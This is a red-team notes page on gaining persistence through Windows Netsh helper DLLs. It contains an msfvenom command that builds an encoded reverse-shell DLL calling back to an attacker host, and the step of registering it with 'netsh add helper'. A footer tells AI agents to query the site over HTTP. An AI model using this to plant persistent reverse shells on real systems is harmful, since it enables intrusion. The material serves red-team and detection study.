# Netsh Helper DLL Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility. The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh. Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if software (ex:VPN) is present on the system that executes netsh.exe as part of its normal functionality. Example: Netsh is a command-line scripting utility that allows you to display or modify the network configuration of a computer that is currently running. Net sh also provides scripting features that allows you to run a group of commands in batch mode against a specific computer. Netsh interacts with other operating system components by using dynamic-link library (DLL) files. Each netsh helper DLL provides an extensive set of features. Netsh functionality can be extended with the use of DLL files. We first create our dll payload and send it to the target workstation using the msfvenom command: msfvenom --platform Windows --arch x64 --payload windows/x64/shell\_reverse\_tcp LHOST=10.0.2.9 LPORT=4444 --encoder x64/xor --iterations 10 --format dll --out payload.dll ![](/files/-MRhMjhmbogz_YQ0YgTQ) Once we send our payload with netsh we will add a helper with netsh add helper and point it to our dll payload. ![](/files/-MRhMfOAR6kNfOA8IRyp) Once our helper is added we immediately get a connection, but we are trying to work as a persistence method so we can close this window and wait until the user uses at any point netsh and we shall receive a reverse shell ![](/files/-MRhMha4DKf0m4kQ43JU) Shell ![](/files/-MRhMiLTWhR3Fp0lB_Yo) --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://dmcxblue.gitbook.io/red-team-notes-2-0/red-team-techniques/persistence/t1546-event-triggered-execution/netsh-helper-dll.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.